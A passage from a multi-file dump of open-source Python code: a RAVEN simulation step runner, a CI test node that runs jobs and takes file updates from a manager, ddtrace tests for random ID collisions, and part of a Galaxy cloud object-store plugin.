stepInstance = self.stepsDict[stepName] #retrieve the instance of the step
self.raiseAMessage('-'*2+' Beginning step {0:50}'.format(stepName+' of type: '+stepInstance.type)+2*'-')#,color='green')
self.runInfoDict['stepName'] = stepName #provide the name of the step to runInfoDict
stepInputDict = {} #initialize the input dictionary for a step. Never use an old one!!!!!
stepInputDict['Input' ] = [] #set the Input to an empty list
stepInputDict['Output'] = [] #set the Output to an empty list
#fill the take a a step input dictionary just to recall: key= role played in the step b= Class, c= Type, d= user given name
for [key,b,c,d] in stepInstance.parList:
#Only for input and output we allow more than one object passed to the step, so for those we build a list
if key == 'Input' or key == 'Output':
stepInputDict[key].append(self.entities[b][d])
else:
stepInputDict[key] = self.entities[b][d]
#add the global objects
stepInputDict['jobHandler'] = self.jobHandler
#generate the needed assembler to send to the step
for key in stepInputDict.keys():
if type(stepInputDict[key]) == list:
stepindict = stepInputDict[key]
else:
stepindict = [stepInputDict[key]]
# check assembler. NB. If the assembler refers to an internal object the relative dictionary
# needs to have the format {'internal':[(None,'variableName'),(None,'variable name')]}
for stp in stepindict:
self.generateAllAssemblers(stp)
#if 'Sampler' in stepInputDict.keys(): stepInputDict['Sampler'].generateDistributions(self.distributionsDict)
#running a step
stepInstance.takeAstep(stepInputDict)
#---------------here what is going on? Please add comments-----------------
for output in stepInputDict['Output']:
if self.FIXME:
self.raiseAMessage('This is for the filter, it needs to go when the filtering strategy is done')
if "finalize" in dir(output):
output.finalize()
self.raiseAMessage('-'*2+' End step {0:50} '.format(stepName+' of type: '+stepInstance.type)+2*'-'+'\n')#,color='green')
self.jobHandler.shutdown()
self.messageHandler.printWarnings()
# implicitly, the job finished successfully if we got here.
self.writeStatusFile()
self.raiseAMessage('Run complete!', forcePrint=True)
def generateAllAssemblers(self, objectInstance):
"""
This method is used to generate all assembler objects at the Step construction stage
@ In, objectInstance, Instance, Instance of RAVEN entity, i.e. Input, Sampler, Model
@ Out, None
"""
if "whatDoINeed" in dir(objectInstance):
neededobjs = {}
neededObjects = objectInstance.whatDoINeed()
for mainClassStr in neededObjects.keys():
if mainClassStr not in self.entities.keys() and mainClassStr != 'internal':
self.raiseAnError(IOError,'Main Class '+mainClassStr+' needed by '+stp.name + ' unknown!')
neededobjs[mainClassStr] = {}
for obj in neededObjects[mainClassStr]:
if obj[1] in vars(self):
neededobjs[mainClassStr][obj[1]] = vars(self)[obj[1]]
elif obj[1] in self.entities[mainClassStr].keys():
if obj[0]:
if obj[0] not in self.entities[mainClassStr][obj[1]].type:
self.raiseAnError(IOError,'Type of requested object '+obj[1]+' does not match the actual type!'+ obj[0] + ' != ' + self.entities[mainClassStr][obj[1]].type)
neededobjs[mainClassStr][obj[1]] = self.entities[mainClassStr][obj[1]]
self.generateAllAssemblers(neededobjs[mainClassStr][obj[1]])
elif obj[1] in 'all':
# if 'all' we get all the objects of a certain 'mainClassStr'
for allObject in self.entities[mainClassStr]:
neededobjs[mainClassStr][allObject] = self.entities[mainClassStr][allObject]
else:
self.raiseAnError(IOError,'Requested object <{n}> is not part of the Main Class <{m}>!'
.format(n=obj[1], m=mainClassStr) +
'\nOptions are:', self.entities[mainClassStr].keys())
objectInstance.generateAssembler(neededobjs)
def clearStatusFile(self):
"""
Remove the status file from disk so we can really tell when RAVEN has successfully finished.
This doesn't seem to be a very robust strategy, but it is working for now.
@ In, None
@ Out, None
"""
try:
os.remove('.ravenStatus')
except OSError as e:
if os.path.isfile('.ravenStatus'):
self.raiseAWarning(f'RAVEN status file detected but not removable! Got: "{e}"')
def writeStatusFile(self):
"""
Write a status file to disk so we can really tell when RAVEN has successfully finished.
This doesn't seem to be a very robust strategy, but it is working for now.
@ In, None
@ Out, None
"""
with open('.ravenStatus', 'w') as f:
f.writelines('Success')
|
node.py
|
#!/usr/bin/env python2
"""
WARNING! This file is auto updated from the node manager. Any changes will
be lost when the client disconnects and reconnects.
This file is compatible with python2 and python3.
Theory of operation
1. Read the config file getting
- Server and port to connect too
- What arrays are available to use
2. Connect to the server
3. Wait for a command request
4. If server connection goes away or haven't received ping, close connection
and try to periodically re-establish communication
Command requests include:
ping - check to see if the connection is working
arrays - Return array information on what is available to test
running - Return which arrays are currently running tests
job_create - Submit a new test to run (Creates a new process)
jobs - Return job state information on all submitted jobs
job - Return job state information about a specific job
job_delete - Delete the specific job request freeing resources
job_completion - Retrieve the exit code and log for specified job
Service which runs a test(s) on the same box as service
See: https://github.com/tasleson/lsm-ci/blob/master/LICENSE
"""
import string
import random
import yaml
import os
import json
import sys
import pickle
from subprocess import call
from multiprocessing import Process
import testlib
import time
import traceback
import tempfile
import shutil
jobs = {}
config = {}
STARTUP_CWD = ""
NODE = None
def _lcall(command, job_id):
"""
Call an executable and return a tuple of exitcode, stdout&stderr
"""
# Write output to a file so we can see what's going on while it's running
f = "/tmp/%s.out" % job_id
with open(f, "w", buffering=1) as log: # Max buffer 1 line (text mode)
exit_value = call(command, stdout=log, stderr=log)
return exit_value, f
def _file_name(job_id):
# If this log directory is located in /tmp, the system may remove the
# directory after a while, making us fail to log when needed.
log_dir = config["LOGDIR"]
if not os.path.exists(log_dir):
os.makedirs(log_dir)
base = "%s/%s" % (log_dir, job_id)
return base + ".out"
def _run_command(job_id, args):
ec = 0
cmd = []
log_dir = ""
try:
cmd = [config["PROGRAM"]]
log_dir = config["LOGDIR"]
cmd.extend(args)
(ec, output_file) = _lcall(cmd, job_id)
log = _file_name(job_id)
# Read in output file in it's entirety
with open(output_file, "r") as o:
out = o.read()
with open(log, "wb") as error_file:
pickle.dump(dict(EC=str(1), OUTPUT=out), error_file)
error_file.flush()
# Delete file to prevent /tmp from filling up, but after we have
# written out error file, in case we hit a bug
os.remove(output_file)
except Exception:
testlib.p(
"job_id = %s cmd = '%s', log_dir = %s" % (job_id, str(cmd), log_dir)
)
testlib.p(str(traceback.format_exc()))
# This is a separate process, lets exit with the same exit code as cmd
sys.exit(ec)
def _rs(length):
return "".join(random.choice(string.ascii_lowercase) for _ in range(length))
def _load_config():
global config
cfg = os.path.dirname(os.path.realpath(__file__)) + "/" + "config.yaml"
with open(cfg, "r") as array_data:
config = yaml.safe_load(array_data.read())
# If the user didn't specify a full path in the configuration file we
# expect it in the same directory as this file
if config["PROGRAM"][0] != "/":
config["PROGRAM"] = (
os.path.dirname(os.path.realpath(__file__))
+ "/"
+ config["PROGRAM"]
)
# Lets make sure import external files/directories are present
if not os.path.exists(config["PROGRAM"]):
testlib.p("config PROGRAM %s does not exist" % config["PROGRAM"])
sys.exit(1)
if not (
os.path.exists(config["LOGDIR"])
and os.path.isdir(config["LOGDIR"])
and os.access(config["LOGDIR"], os.W_OK)
):
testlib.p(
"config LOGDIR not preset or not a "
"directory %s or not writeable" % (config["LOGDIR"])
)
sys.exit(1)
def _remove_file(job_id):
fn = _file_name(job_id)
try:
testlib.p("Deleting file: %s" % fn)
os.remove(fn)
except IOError as ioe:
testlib.p("Error deleting file: %s, reason: %s" % (fn, str(ioe)))
pass
def _update_state(job_id):
global jobs
job = jobs[job_id]
# See if the process has ended
p = job["PROCESS"]
p.join(0)
if not p.is_alive():
testlib.p("%s exited with %s " % (p.name, str(p.exitcode)))
sys.stdout.flush()
if p.exitcode == 0:
job["STATUS"] = "SUCCESS"
else:
job["STATUS"] = "FAIL"
def _return_state(job_id, only_running=False):
_update_state(job_id)
job = jobs[job_id]
if not only_running or (only_running and job["STATUS"] == "RUNNING"):
return {
"STATUS": job["STATUS"],
"ID": job["ID"],
"JOB_ID": job_id,
"PLUGIN": job["PLUGIN"],
}
return None
# State for tests are are currently running
# @returns JSON array with the following:
#
def _only_running():
rc = []
for k in jobs.keys():
s = _return_state(k, True)
if s:
rc.append(s)
return rc
class Cmds(object):
"""
Class that handles the rest methods.
"""
@staticmethod
def ping():
"""
Used to see if the node manager can talk to the node.
:return: string pong and http code 200
"""
return "pong", 200, ""
# Returns systems available for running tests
@staticmethod
def arrays():
"""
Returns which arrays are available.
:return: array of tuples which gets converted into JSON and http 200
status code.
"""
rc = [(x["ID"], x["PLUGIN"]) for x in config["ARRAYS"]]
return rc, 200, ""
@staticmethod
def running():
"""
Returns dictionary which gets converted to JSON tests that
are still running.
:return: array of dictionary
[ {"STATUS": ['RUNNING'|'SUCCESS'|'FAIL'}, "ID": <array id>,
"JOB_ID": [a-z]{32}, "PLUGIN":'lsm plugin'}, ... ]
"""
rc = _only_running()
return rc, 200, ""
@staticmethod
def job_create(repo, branch, array_id):
"""
Submit a new test to run
:param repo: The git repo to use
:param branch: The git branch
:param array_id: The test array ID
:return:
412 - Job already running on specified array
400 - Input parameters are incorrect or missing
201 - Test started
"""
global jobs
testlib.p("Running test for %s %s %s" % (repo, branch, array_id))
if any([x for x in config["ARRAYS"] if x["ID"] == array_id]):
# Add a check to make sure we aren't already _running_
# a job for this array
for k, v in jobs.items():
if v["ID"] == array_id:
# Update status to make sure
_update_state(k)
if v["STATUS"] == "RUNNING":
return "", 412, "Job already running on array"
# Run the job
# Build the arguments for the script
uri = ""
password = ""
plug = ""
for a in config["ARRAYS"]:
if a["ID"] == array_id:
uri = a["URI"]
password = a["PASSWORD"]
plug = a["PLUGIN"]
break
# When we add rpm builds we will need client to pass
# which 'type' too
incoming = ("git", repo, branch, uri, password)
job_id = _rs(32)
p = Process(target=_run_command, args=(job_id, incoming))
p.name = "|".join(incoming)
p.start()
jobs[job_id] = dict(
STATUS="RUNNING", PROCESS=p, ID=array_id, PLUGIN=plug
)
return job_id, 201, ""
else:
return "", 400, "Invalid array specified!"
@staticmethod
def jobs():
"""
Returns all known jobs regardless of status
:return: array of dictionaries
"""
rc = []
for k in jobs.keys():
rc.append(_return_state(k))
return rc, 200, ""
@staticmethod
def job(job_id):
"""
Get the status of the specified job
:param job_id: ID of job to get status on
:return: job state
"""
global jobs
if job_id in jobs:
return _return_state(job_id), 200, ""
return "", 404, "Job not found!"
@staticmethod
def job_completion(job_id):
"""
Get the exit code and log file for the specified job
:param job_id: ID of job
:return: http status:
200 on success
400 if job is still running
404 if job is not found
json payload { "EC": <exit code>, "OUTPUT": "std out + std error"}
"""
if job_id in jobs:
j = jobs[job_id]
log = _file_name(job_id)
if j["STATUS"] != "RUNNING":
try:
testlib.p("Retrieving log file: %s" % log)
with open(log, "rb") as foo:
result = pickle.load(foo)
return json.dumps(result), 200, ""
except:
testlib.p("Exception in retrieving log file!")
testlib.p(str(traceback.format_exc()))
# We had a job in the hash, but an error while processing
# the log file, we will return a 404 and make sure the
# file is indeed gone
try:
del jobs[job_id]
_remove_file(job_id)
except:
# These aren't the errors you're looking for..., move
# along...
pass
return "", 404, "Job log file not found"
else:
return "", 400, "Job still running"
else:
testlib.p("Job ID %s not found in hash!" % job_id)
return "", 404, "Job not found"
@staticmethod
def job_delete(job_id):
"""
Delete a test that is no longer running, cleans up in memory hash and
removes log file from disk
:param job_id: ID of job
:return: http status 200 on success, else 400 if job is still running
or 404 if job is not found
"""
global jobs
if job_id in jobs:
j = jobs[job_id]
if j["STATUS"] != "RUNNING":
del jobs[job_id]
_remove_file(job_id)
return "", 200, ""
else:
return "", 400, "Job still running"
else:
return "", 404, "Job not found"
@staticmethod
def md5_files(files):
"""
Return the md5 for a list of files, the file cannot contain any '/' and
we are restricting it to the same directory as the node.py executing
directory as we are only expecting to check files in the same directory.
:param files: List of files
:return: An array of md5sums in the order the files were given to us.
"""
rc = []
for file_name in files:
if "/" in file_name:
return (
rc,
412,
"File %s contains illegal character" % file_name,
)
full_fn = os.path.join(
os.path.dirname(os.path.realpath(__file__)), file_name
)
if os.path.exists(full_fn) and os.path.isfile(full_fn):
rc.append(testlib.file_md5(full_fn))
else:
# If a file doesn't exist lets return a bogus value, then the
# server will push the new file down.
rc.append("File not found!")
return rc, 200, ""
@staticmethod
def _update_files(tmp_dir, file_data):
src_files = []
# Dump the file locally to temp directory
for i in file_data:
fn = i["fn"]
data = i["data"]
md5 = i["md5"]
if "/" in fn:
return "", 412, "File name has directory sep. in it! %s" % fn
tmp_file = os.path.join(tmp_dir, fn)
with open(tmp_file, "w") as t:
t.write(data)
if md5 != testlib.file_md5(tmp_file):
return "", 412, "md5 miss-match for %s" % tmp_file
src_files.append(tmp_file)
# Move the files into position
for src_path_name in src_files:
perms = None
name = os.path.basename(src_path_name)
dest_path_name = os.path.join(
os.path.dirname(os.path.realpath(__file__)), name
)
# Before we move, lets store off the perms, so we can restore them
# after the move
if os.path.exists(dest_path_name):
perms = os.stat(dest_path_name).st_mode & 0o777
testlib.p("Moving: %s -> %s" % (src_path_name, dest_path_name))
shutil.move(src_path_name, dest_path_name)
if perms:
testlib.p("Setting perms: %s %s" % (dest_path_name, oct(perms)))
os.chmod(dest_path_name, perms)
return "", 200, ""
@staticmethod
def update_files(file_data):
"""
Given a file_name, the file_contents and the md5sum for the file we will
dump the file contents to a tmp file, validate the md5 and if all is
well we will replace the file_name with it.
Note: file data is a hash with keys: 'fn', 'data', 'md5'
:param file_data:
:return: http 200 on success, else 412
"""
# Create a temp directory
td = tempfile.mkdtemp()
testlib.p("Updating client files!")
try:
result = Cmds._update_files(td, file_data)
except:
result = (
"",
412,
"Exception on file update %s " % str(traceback.format_exc()),
)
# Remove tmp directory and the files we left in it
shutil.rmtree(td)
return result
@staticmethod
def restart():
"""
Restart the node
:return: None
"""
global NODE
testlib.p("Restarting node as requested by node_manager")
os.chdir(STARTUP_CWD)
NODE.disconnect()
os.execl(sys.executable, *([sys.executable] + sys.argv))
def process_request(req):
"""
Processes the request.
:param req: The request
:return: Appropriate http status code.
"""
data = ""
ec = 0
error_msg = ""
if hasattr(Cmds, req.method):
if req.args and len(req.args):
data, ec, error_msg = getattr(Cmds, req.method)(*req.args)
else:
data, ec, error_msg = getattr(Cmds, req.method)()
NODE.return_response(testlib.Response(data, ec, error_msg))
else:
# Bounce this back to the requester
NODE.return_response(testlib.Response("", 404, "Command not found!"))
if __name__ == "__main__":
# Load the available test arrays from config file
STARTUP_CWD = os.getcwd()
_load_config()
server = config["SERVER_IP"]
port = config["SERVER_PORT"]
proxy_is_ip = config["PROXY_IS_IP"]
use_proxy = config["USE_PROXY"]
proxy_host = config["PROXY_HOST"]
proxy_port = config["PROXY_PORT"]
servers = [server, "ci.asleson.org"]
connection_count = 0
# Connect to server
while True:
# Round robin on IP address, starting with the one that is specified
# in user configuration.
server_addr = servers[connection_count % len(servers)]
testlib.p("Attempting connection to %s:%d" % (server_addr, port))
NODE = testlib.TestNode(
server_addr,
port,
use_proxy=use_proxy,
proxy_is_ip=proxy_is_ip,
proxy_host=proxy_host,
proxy_port=proxy_port,
)
if NODE.connect():
testlib.p("Connected to %s" % server_addr)
have_connected = True
# noinspection PyBroadException
try:
while True:
request = NODE.wait_for_request()
process_request(request)
except KeyboardInterrupt:
NODE.disconnect()
sys.exit(0)
except Exception:
testlib.p(str(traceback.format_exc()))
pass
# This probably won't do much as socket is quite likely toast
NODE.disconnect()
else:
connection_count += 1
# If we get here we need to re-establish connection, make sure we don't
# swamp the processor
time.sleep(10)
|
test_rand.py
|
from itertools import chain
import multiprocessing as mp
try:
from multiprocessing import SimpleQueue as MPQueue
except ImportError:
from multiprocessing.queues import SimpleQueue as MPQueue
import os
import threading
from ddtrace import Span
from ddtrace import tracer
from ddtrace.internal import _rand
from ddtrace.internal.compat import Queue
def test_random():
m = set()
for i in range(0, 2 ** 16):
n = _rand.rand64bits()
assert 0 <= n <= 2 ** 64 - 1
assert n not in m
m.add(n)
def test_fork_no_pid_check():
q = MPQueue()
pid = os.fork()
# Generate random numbers in the parent and child processes after forking.
# The child sends back their numbers to the parent where we check to see
# if we get collisions or not.
if pid > 0:
# parent
rns = {_rand.rand64bits() for _ in range(100)}
child_rns = q.get()
assert rns & child_rns == set()
else:
# child
try:
rngs = {_rand.rand64bits() for _ in range(100)}
q.put(rngs)
finally:
# Kill the process so it doesn't continue running the rest of the
# test suite in a separate process. Note we can't use sys.exit()
# as it raises an exception that pytest will detect as an error.
os._exit(0)
def test_fork_pid_check():
q = MPQueue()
pid = os.fork()
# Generate random numbers in the parent and child processes after forking.
# The child sends back their numbers to the parent where we check to see
# if we get collisions or not.
if pid > 0:
# parent
rns = {_rand.rand64bits() for _ in range(100)}
child_rns = q.get()
assert rns & child_rns == set()
else:
# child
try:
rngs = {_rand.rand64bits() for _ in range(100)}
q.put(rngs)
finally:
# Kill the process so it doesn't continue running the rest of the
# test suite in a separate process. Note we can't use sys.exit()
# as it raises an exception that pytest will detect as an error.
os._exit(0)
def test_multiprocess():
q = MPQueue()
def target(q):
q.put([_rand.rand64bits() for _ in range(100)])
ps = [mp.Process(target=target, args=(q,)) for _ in range(30)]
for p in ps:
p.start()
for p in ps:
p.join()
ids_list = [_rand.rand64bits() for _ in range(1000)]
ids = set(ids_list)
assert len(ids_list) == len(ids), "Collisions found in ids"
while not q.empty():
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids_list) == len(child_ids), "Collisions found in subprocess ids"
assert ids & child_ids == set()
ids = ids | child_ids # accumulate the ids
def test_threadsafe():
# Check that the PRNG is thread-safe.
# This obviously won't guarantee thread safety, but it's something
# at least.
# To provide some validation of this method I wrote a slow, unsafe RNG:
#
# state = 4101842887655102017
#
# def bad_random():
# global state
# state ^= state >> 21
# state ^= state << 35
# state ^= state >> 4
# return state * 2685821657736338717
#
# which consistently fails this test.
q = Queue()
def _target():
# Generate a bunch of numbers to try to maximize the chance that
# two threads will be calling rand64bits at the same time.
rngs = [_rand.rand64bits() for _ in range(200000)]
q.put(rngs)
ts = [threading.Thread(target=_target) for _ in range(5)]
for t in ts:
t.start()
for t in ts:
t.join()
ids = set()
while not q.empty():
new_ids_list = q.get()
new_ids = set(new_ids_list)
assert len(new_ids) == len(new_ids_list), "Collision found in ids"
assert ids & new_ids == set()
ids = ids | new_ids
assert len(ids) > 0
def test_tracer_usage_fork():
q = MPQueue()
pid = os.fork()
# Similar test to test_fork() above except we use the tracer API.
# In this case we expect to never have collisions.
if pid > 0:
# parent
parent_ids_list = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(100)])
)
parent_ids = set(parent_ids_list)
assert len(parent_ids) == len(parent_ids_list), "Collisions found in parent process ids"
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids) == len(child_ids_list), "Collisions found in child process ids"
assert parent_ids & child_ids == set()
else:
# child
try:
child_ids = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(100)])
)
q.put(child_ids)
finally:
# Kill the process so it doesn't continue running the rest of the
# test suite in a separate process. Note we can't use sys.exit()
# as it raises an exception that pytest will detect as an error.
os._exit(0)
def test_tracer_usage_multiprocess():
q = MPQueue()
# Similar to test_multiprocess(), ensures that no collisions are
# generated between parent and child processes while using
# multiprocessing.
# Note that we have to be wary of the size of the underlying
# pipe in the queue: https://bugs.python.org/msg143081
def target(q):
ids_list = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(10)])
)
q.put(ids_list)
ps = [mp.Process(target=target, args=(q,)) for _ in range(30)]
for p in ps:
p.start()
for p in ps:
p.join()
ids_list = list(chain.from_iterable((s.span_id, s.trace_id) for s in [tracer.start_span("s") for _ in range(100)]))
ids = set(ids_list)
assert len(ids) == len(ids_list), "Collisions found in ids"
while not q.empty():
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids) == len(child_ids_list), "Collisions found in subprocess ids"
assert ids & child_ids == set()
ids = ids | child_ids # accumulate the ids
def test_span_api_fork():
q = MPQueue()
pid = os.fork()
if pid > 0:
# parent
parent_ids_list = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [Span(None, None) for _ in range(100)])
)
parent_ids = set(parent_ids_list)
assert len(parent_ids) == len(parent_ids_list), "Collisions found in parent process ids"
child_ids_list = q.get()
child_ids = set(child_ids_list)
assert len(child_ids) == len(child_ids_list), "Collisions found in child process ids"
assert parent_ids & child_ids == set()
else:
# child
try:
child_ids = list(
chain.from_iterable((s.span_id, s.trace_id) for s in [Span(None, None) for _ in range(100)])
)
q.put(child_ids)
finally:
os._exit(0)
|
cloud.py
|
"""
Object Store plugin for Cloud storage.
"""
import logging
import multiprocessing
import os
import os.path
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
safe_relpath,
umask_fix_perms,
)
from galaxy.util.sleeper import Sleeper
from .s3 import parse_config_xml
from ..objectstore import ConcreteObjectStore, convert_bytes
try:
from cloudbridge.factory import CloudProviderFactory, ProviderList
from cloudbridge.interfaces.exceptions import InvalidNameException
except ImportError:
CloudProviderFactory = None
ProviderList = None
log = logging.getLogger(__name__)
NO_CLOUDBRIDGE_ERROR_MESSAGE = (
"Cloud ObjectStore is configured, but no CloudBridge dependency available."
"Please install CloudBridge or modify ObjectStore configuration."
)
class CloudConfigMixin:
def _config_to_dict(self):
return {
"provider": self.provider,
"auth": self.credentials,
"bucket": {
"name": self.bucket_name,
"use_reduced_redundancy": self.use_rr,
},
"connection": {
"host": self.host,
"port": self.port,
"multipart": self.multipart,
"is_secure": self.is_secure,
"conn_path": self.conn_path,
},
"cache": {
"size": self.cache_size,
"path": self.staging_path,
}
}
class Cloud(ConcreteObjectStore, CloudConfigMixin):
"""
Object store that stores objects as items in an cloud storage. A local
cache exists that is used as an intermediate location for files between
Galaxy and the cloud storage.
"""
store_type = 'cloud'
def __init__(self, config, config_dict):
super().__init__(config, config_dict)
self.transfer_progress = 0
bucket_dict = config_dict['bucket']
connection_dict = config_dict.get('connection', {})
cache_dict = config_dict['cache']
self.provider = config_dict["provider"]
self.credentials = config_dict["auth"]
self.bucket_name = bucket_dict.get('name')
self.use_rr = bucket_dict.get('use_reduced_redundancy', False)
self.max_chunk_size = bucket_dict.get('max_chunk_size', 250)
self.host = connection_dict.get('host', None)
self.port = connection_dict.get('port', 6000)
self.multipart = connection_dict.get('multipart', True)
self.is_secure = connection_dict.get('is_secure', True)
self.conn_path = connection_dict.get('conn_path', '/')
self.cache_size = cache_dict.get('size', -1)
self.staging_path = cache_dict.get('path') or self.config.object_store_cache_path
self._initialize()
def _initialize(self):
if CloudProviderFactory is None:
raise Exception(NO_CLOUDBRIDGE_ERROR_MESSAGE)
self.conn = self._get_connection(self.provider, self.credentials)
self.bucket = self._get_bucket(self.bucket_name)
# Clean cache only if value is set in galaxy.ini
if self.cache_size != -1:
# Convert GBs to bytes for comparison
self.cache_size = self.cache_size * 1073741824
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
self.cache_monitor_thread.start()
log.info("Cache cleaner manager started")
# Test if 'axel' is available for parallel download and pull the key into cache
try:
subprocess.call('axel')
self.use_axel = True
except OSError:
self.use_axel = False
@staticmethod
def _get_connection(provider, credentials):
log.debug(f"Configuring `{provider}` Connection")
if provider == "aws":
config = {"aws_access_key": credentials["access_key"],
"aws_secret_key": credentials["secret_key"]}
connection = CloudProviderFactory().create_provider(ProviderList.AWS, config)
elif provider == "azure":
config = {"azure_subscription_id": credentials["subscription_id"],
"azure_client_id": credentials["client_id"],
"azure_secret": credentials["secret"],
"azure_tenant": credentials["tenant"]}
connection = CloudProviderFactory().create_provider(ProviderList.AZURE, config)
elif provider == "google":
config = {"gcp_service_creds_file": credentials["credentials_file"]}
connection = CloudProviderFactory().create_provider(ProviderList.GCP, config)
else:
raise Exception(f"Unsupported provider `{provider}`.")
# Ideally it would be better to assert if the connection is
# authorized to perform operations required by ObjectStore
# before returning it (and initializing ObjectStore); hence
# any related issues can be handled properly here, and ObjectStore
# can "trust" the connection is established.
#
# However, the mechanism implemented in Cloudbridge to assert if
# a user/service is authorized to perform an operation, assumes
# the user/service is granted with an elevated privileges, such
# as admin/owner-level access to all resources. For a detailed
# discussion see:
#
# https://github.com/CloudVE/cloudbridge/issues/135
#
# Hence, if a resource owner wants to only authorize Galaxy to r/w
# a bucket/container on the provider, but does not allow it to access
# other resources, Cloudbridge may fail asserting credentials.
# For instance, to r/w an Amazon S3 bucket, the resource owner
# also needs to authorize full access to Amazon EC2, because Cloudbridge
# leverages EC2-specific functions to assert the credentials.
#
# Therefore, to adhere with principle of least privilege, we do not
# assert credentials; instead, we handle exceptions raised as a
# result of signing API calls to cloud provider (e.g., GCP) using
# incorrect, invalid, or unauthorized credentials.
return connection
@classmethod
def parse_xml(clazz, config_xml):
# The following reads common cloud-based storage configuration
# as implemented for the S3 backend. Hence, it also attempts to
# parse S3-specific configuration (e.g., credentials); however,
# such provider-specific configuration is overwritten in the
# following.
config = parse_config_xml(config_xml)
try:
provider = config_xml.attrib.get("provider")
if provider is None:
msg = "Missing `provider` attribute from the Cloud backend of the ObjectStore."
log.error(msg)
raise Exception(msg)
provider = provider.lower()
config["provider"] = provider
# Read any provider-specific configuration.
auth_element = config_xml.findall("auth")[0]
missing_config = []
if provider == "aws":
akey = auth_element.get("access_key")
if akey is None:
missing_config.append("access_key")
skey = auth_element.get("secret_key")
if skey is None:
missing_config.append("secret_key")
config["auth"] = {
"access_key": akey,
"secret_key": skey}
elif provider == "azure":
sid = auth_element.get("subscription_id")
if sid is None:
missing_config.append("subscription_id")
cid = auth_element.get("client_id")
if cid is None:
missing_config.append("client_id")
sec = auth_element.get("secret")
if sec is None:
missing_config.append("secret")
ten = auth_element.get("tenant")
if ten is None:
missing_config.append("tenant")
config["auth"] = {
"subscription_id": sid,
"client_id": cid,
"secret": sec,
"tenant": ten}
elif provider == "google":
cre = auth_element.get("credentials_file")
if not os.path.isfile(cre):
msg = f"The following file specified for GCP credentials not found: {cre}"
log.error(msg)
raise OSError(msg)
if cre is None:
missing_config.append("credentials_file")
config["auth"] = {
"credentials_file": cre}
else:
msg = f"Unsupported provider `{provider}`."
log.error(msg)
raise Exception(msg)
if len(missing_config) > 0:
msg = "The following configuration required for {} cloud backend " \
"are missing: {}".format(provider, missing_config)
log.error(msg)
raise Exception(msg)
else:
return config
except Exception:
log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
raise
def to_dict(self):
as_dict = super().to_dict()
as_dict.update(self._config_to_dict())
return as_dict
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
# Get the time given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
# How much to delete? If simply deleting up to the cache-10% limit,
# is likely to be deleting frequently and may run the risk of hitting
# the limit - maybe delete additional #%?
# For now, delete enough to leave at least 10% of the total cache free
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contains 3-element tuples,
positioned as follows: position 0 holds file last accessed timestamp
(as time.struct_time), position 1 holds file path, and position 2 has
file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394)
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
for entry in enumerate(file_list):
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
def _get_bucket(self, bucket_name):
try:
bucket = self.conn.storage.buckets.get(bucket_name)
if bucket is None:
log.debug("Bucket not found, creating a bucket with handle '%s'", bucket_name)
bucket = self.conn.storage.buckets.create(bucket_name)
log.debug("Using cloud ObjectStore with bucket '%s'", bucket.name)
return bucket
except InvalidNameException:
log.exception("Invalid bucket name -- unable to continue")
raise
except Exception:
# These two generic exceptions will be replaced by specific exceptions
# once proper exceptions are exposed by CloudBridge.
log.exception(f"Could not get bucket '{bucket_name}'")
raise Exception
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms(path, self.config.umask, 0o666, self.config.gid)
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None,
obj_dir=False, **kwargs):
# extra_dir should never be constructed from provided data but just
# make sure there are no shenannigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name:
if not safe_relpath(alt_name):
